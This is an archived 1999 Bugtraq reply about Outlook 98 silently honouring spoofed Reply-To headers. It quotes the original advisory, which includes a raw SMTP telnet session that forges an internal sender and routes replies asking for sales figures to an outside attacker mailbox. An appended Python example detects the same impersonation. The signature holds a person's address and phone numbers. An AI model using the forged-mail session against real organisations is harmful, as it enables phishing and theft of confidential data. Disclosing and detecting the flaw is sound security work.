[10421] in bugtraq
Re: Outlook 98 allows spoofing internal users
daemon@ATHENA.MIT.EDU (Sebastian Schreiber)
Mon May 3 19:30:15 1999
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: QUOTED-PRINTABLE
Message-Id: <19990502214139.A3918@zxmiu07.extern.uni-tuebingen.de>
Date: Sun, 2 May 1999 21:41:39 +0200
Reply-To: Sebastian.Schreiber@gmx.net
From: Sebastian Schreiber <Sebastian.Schreiber@STUDENT.UNI-TUEBINGEN.DE>
X-To: Nate Lawson <nate@root.org>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.BSF.3.96.990420145919.11372A-100000@root.org>; from Nate
Lawson on Tue, Apr 20, 1999 at 03:10:05PM -0700
Hi Nate,
I was not able to reproduce the exploit that you reported to the
bugtraq mailing list. Outlook98 did exactly what I expected: when I
open the mail, I see the "From:"-header in the message. When I reply
to the email, Outlook takes the "Reply-To:"-address of the
header. Which version of Outlook did you test?
Best Regards, Sebastian
PS: your "quick script" has a little bug: the header entry should be
"Reply-To:" instead of "Reply To:".
Nate Lawson <nate@root.org> wrote:
> Problem: Outlook uses a sender's Reply-To address silently, allowing
> a user to inadvertently send data to an Internet mail account
> when intending to reply to an internal, trusted user.
>
> Impact: Anyone on the Internet can spoof a trusted internal Exchange user
> and get replies sent back to themselves without the user knowing they
> weren't responding to another internal user.
>
> How to reproduce:
>
> 1. Spoof mail as an internal user with a Reply-To address claiming to be
> an internal user, but an address of an Internet account, say hotmail.
> 2. Go into Outlook and read the mail. The mail looks like it was internally
> generated but viewing the full Internet headers under View->Options
> shows the bogus Reply-To header.
> 3. Hit Reply in Outlook. The To: field looks like it's going to a valid
> internal user, but right clicking on it and choosing Properties shows
> that the internal user it is sending the reply to is actually an Internet
> address.
> 4. Enter some text and hit Send. Observe that the mail went to the attacker's
> account, not the internal one.
>
> A quick script:
>
> {root 5:00pm} ~> telnet mail.example.com 25
> Trying 10.20.2.5...
> Connected to mail.example.com.
> Escape character is '^]'.
> 220 mail.example.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2448.0) ready
> helo losebag
> 250 OK
> mail from:<>
> 250 OK - mail from <>
> rcpt to:<accounting@example.com>
> 250 OK - Recipient <accounting@example.com>
> data
> 354 Send data. End with CRLF.CRLF
> From: Nate Lawson
> To: Accounting
> Reply To: Nate Lawson<intruder@hotmail.com>
> Subject: important!
>
> Please reply with the latest copy of our sales figures!
>
> Thanks,
> Nate
> .
> 250 OK
> quit
> 221 closing connection
> Connection closed by foreign host.
>
> Now, a reply to the email will go not to the trusted internal user Nate
> Lawson <nlawson@example.com> but to the attacker, <intruder@hotmail.com>.
> Worse, the user sees no indication that the mail is outward-bound! The
> To: field on the reply simply shows "Nate Lawson", a valid internal user.
>
> Affected programs: Only tested on Outlook 98
>
> Known use of this bug to get confidential information: none yet
>
> Suggested Fix: always show the full email address of any recipient that is
> not local (i.e. username@example.com would be hidden but any instance of
> user@hotmail.com would be shown)
>
> Microsoft has been notified, but claimed this was a weakness in SMTP and
> would not be fixed until a secure successor to SMTP is implemented. They
> obviously missed the point -- the error is not in that mail can be forged,
> but that Outlook allows a user to respond to a message that looks local
> and legitimate, but is actually destined for an outside address.
>
> -Nate
--
-- What's a letter? Is it like E-mail? ((o)(o))
|---------------------------------------------------ooOo-( )-oOoo-|
| Sebastian Schreiber, Burgholzweg 36, 72070 Tübingen ( ) |
| Germany, Voice: ++49 (0)7071 49570 ( ) |
| GSM: 0049-173-3502725 (..) |
|------------------------------------------------------------------|
Key fingerprint = 3F F5 D5 E0 0A 59 A5 C4 E7 4F 2B EA 7D 83 89 98
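The following is an added example, not code from either poster or from Microsoft. It implements the check behind Nate's "Suggested Fix" for the reproduction steps quoted above: given a raw message, work out where a reply would actually be sent (Reply-To if present, otherwise From, which is the Outlook 98 behaviour the thread describes), decide whether that address is local, and render the To: field so that any non-local address is shown in full. It also flags the specific spoof pattern from the post, a Reply-To that reuses the From display name but points at a different address. The local domain (example.com) and both sample messages are constructed for the example; the spoofed one mirrors the headers in Nate's telnet session with the header name spelled correctly as Reply-To.

```python
# Added example, not part of the original bugtraq thread.
# Computes where a reply to a message would really go and renders the
# recipient the way Nate's "Suggested Fix" asks: local users by name only,
# everything else with the full address visible.
import email
from email.utils import getaddresses, parseaddr

LOCAL_DOMAIN = "example.com"  # assumption: the Exchange site's own domain

# Constructed to mirror the message in the post: From claims an internal
# user, Reply-To silently redirects replies to an outside mailbox.
RAW_SPOOF = b"""From: Nate Lawson <nlawson@example.com>
To: Accounting <accounting@example.com>
Reply-To: Nate Lawson <intruder@hotmail.com>
Subject: important!

Please reply with the latest copy of our sales figures!
"""

# Constructed benign message: no Reply-To, so a reply goes back to From.
RAW_BENIGN = b"""From: Nate Lawson <nlawson@example.com>
To: Accounting <accounting@example.com>
Subject: sales figures

Can you send me the latest sheet?
"""


def domain_of(addr):
    """Lower-cased domain part of an address, '' if it has none."""
    return addr.rpartition("@")[2].lower() if "@" in addr else ""


def is_local(addr, local_domain=LOCAL_DOMAIN):
    """True if the address belongs to our own mail domain."""
    return domain_of(addr) == local_domain.lower()


def reply_targets(raw):
    """(display_name, addr) pairs a Reply would be addressed to.
    Reply-To takes precedence over From, as the post says Outlook does."""
    msg = email.message_from_bytes(raw)
    headers = msg.get_all("Reply-To") or msg.get_all("From") or []
    return [(name, addr) for name, addr in getaddresses(headers) if addr]


def render_recipient(name, addr, local_domain=LOCAL_DOMAIN):
    """Nate's suggested fix: hide the address only for local users;
    any other address is shown in full so the user sees it is outward-bound."""
    if is_local(addr, local_domain):
        return name or addr
    return f"{name} <{addr}>" if name else addr


def audit_reply(raw, local_domain=LOCAL_DOMAIN):
    """Summarise where a reply to `raw` would go and whether that should alarm."""
    msg = email.message_from_bytes(raw)
    from_name, from_addr = parseaddr(msg.get("From", ""))
    targets = reply_targets(raw)
    external = [a for _, a in targets if not is_local(a, local_domain)]
    # The spoof pattern from the post: Reply-To reuses From's display name
    # but carries a different address, so it looks internal and goes outside.
    impersonation = any(
        n.strip().lower() == from_name.strip().lower()
        and a.lower() != from_addr.lower()
        for n, a in targets
    )
    return {
        "to_field": [render_recipient(n, a, local_domain) for n, a in targets],
        "external": external,
        "impersonates_from": impersonation,
    }


if __name__ == "__main__":
    for label, raw in (("spoofed", RAW_SPOOF), ("benign", RAW_BENIGN)):
        print(label, audit_reply(raw))
```

For the spoofed message the To: field renders as "Nate Lawson <intruder@hotmail.com>" and the external list is non-empty; for the benign one it renders as plain "Nate Lawson", which is the only case where hiding the address is safe. The same function fits a mail gateway as well as a client: rejecting or tagging inbound Internet mail whose Reply-To display name matches an internal From but whose address is off-site removes the bait before Outlook ever shows it.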